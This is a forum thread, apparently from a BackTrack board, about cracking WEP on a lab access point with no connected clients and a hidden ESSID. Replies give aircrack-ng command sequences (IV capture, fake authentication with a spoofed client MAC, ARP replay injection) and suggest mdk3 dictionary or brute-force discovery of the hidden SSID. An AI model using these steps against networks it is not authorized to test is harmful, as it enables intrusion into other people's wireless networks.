Cracking WEP with no client

[DamienThorn]

I my test lab I have a AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packet that I receive from the AP. I'll finally convert the broadcast packet so that the AP can generates a new IV.

Before this attacks works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

So, question is How can I successfully authenticates without knowing the ESSID and no wireless clients are connected ?

cheers
Damien

[=TAPE=]

Check the latest video in BT4 video section...

[andresitompul]

Quote:

Originally Posted by DamienThorn

I my test lab I have a AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packet that I receive from the AP. I'll finally convert the broadcast packet so that the AP can generates a new IV.

Before this attacks works, I first need to perform a fake authentication. This succeeds when I know the ESSID.

So, question is How can I successfully authenticates without knowing the ESSID and no wireless clients are connected ?

cheers
Damien

oh yes.. thats a really nice question,..
hi everybody. name is andre, im new in backtrack.

can any body please help to tell me like Damien .


thanks.
Gbu.

[htons139]

first sure start airodump-ng then run

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

insert the AP mac address and ur injection enabled ethernet card in place of mon0

Then start aireplay in arp replay mode and watch for magic!

[DamienThorn]

I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.

When I then launch aireplay-ng using arp reply, I got disassociation messages.

Any suggestions ?

[htons139]

Quote:

Originally Posted by DamienThorn

I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.

When I then launch aireplay-ng using arp reply, I got disassociation messages.

Any suggestions ?

Sorry for confusing you with my other post, you should use "-a" and not "-b" (been corrected in the older post), try that and aireplay-ng should not ask for th essid.

Now for the long version of the reply
-------------------------------------------------
Your case

1-You have an AP that is broadcasting its bssid
2- You have no mac addresses of connected clients (even from other, older session not necessarily at the moment of the attach)

The Attack:

A- Start collecting ivs

airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

make sure you insert the AP bssid in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection enabled NIC in place of mon0

B- Run aireplay in fake auth mode

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Insert the AP mac address and the name of you NIC.

If the Access point does not have mac filtering, then you will be able to use the fake authentication attack without the -h argument, otherwise this attack will not work unless you use

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

where yy:yy:yy:yy:yy:yy is the mac address of an already connected client (NOT YOUR NIC MAC)

C- finally run aireplay in arp replay mode

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

again, replace xx:xx:xx:xx:xx:xx with the AP mac and mon0 with your nic name.

Good luck

[DamienThorn]

Your situation works if the AP is broadcasting its ESSID, but the case is :

1) The AP does not broadcast its ESSID
2) There are no wireless clients connected to the AP

So, in your step B, I cannot use -h YY:YY, since there are no wireless clients

[htons139]

ESSID
The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.

BSSID
The BSSID is a 48bit identity used to identify a particular BSS (Basic Service Set) within an area.

It is clear you need to do some more reading... these are basics you should be informed about... do your home work and ask me no more questions before you do so

[=TAPE=]

^
Dude, you are misreading the OPs question completely..
reading abilities.. hmm..

He is talking about a network that is not broadcasting the ESSID..
So a hidden ssid..


There are a couple of options to try and find out what the essid is ;

1. You do a dictionary attack on the network using mdk3.
2. You do a bruteforce attack on the network using mdk3
(not recommended for any ssid over 4 characters..)
3. You monitor the network and wait for someone to probe it / associate with it.



So at Damien ;

When you are running airodump and checking your network, is it mentioning a length 0 ssid, or length 5 or some other value.

If you can actually see how many characters it is. you can decide on whether to use a bruteforce option. If it is length 0 then you will not know, so would need to try the dictionary approach.

Again.. I posted a vid on that specific situation ;
MDK3 - Cracking hidden SSIDs in back|track 4

Check it out, and obviously, as you know the essid of your network, you can alter wordlists etc to suit the best method of the above.

[Reload]

Quote:

Originally Posted by htons139

Sorry for confusing you with my other post, you should use "-a" and not "-b" (been corrected in the older post), try that and aireplay-ng should not ask for th essid.

Now for the long version of the reply
-------------------------------------------------
Your case

1-You have an AP that is broadcasting its bssid
2- You have no mac addresses of connected clients (even from other, older session not necessarily at the moment of the attach)

The Attack:

A- Start collecting ivs

airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0

make sure you insert the AP bssid in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection enabled NIC in place of mon0

B- Run aireplay in fake auth mode

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

Insert the AP mac address and the name of you NIC.

If the Access point does not have mac filtering, then you will be able to use the fake authentication attack without the -h argument, otherwise this attack will not work unless you use

aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0

where yy:yy:yy:yy:yy:yy is the mac address of an already connected client (NOT YOUR NIC MAC)

C- finally run aireplay in arp replay mode

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0

again, replace xx:xx:xx:xx:xx:xx with the AP mac and mon0 with your nic name.

Good luck

I've been attempting to do this very thing yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format :IV's and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.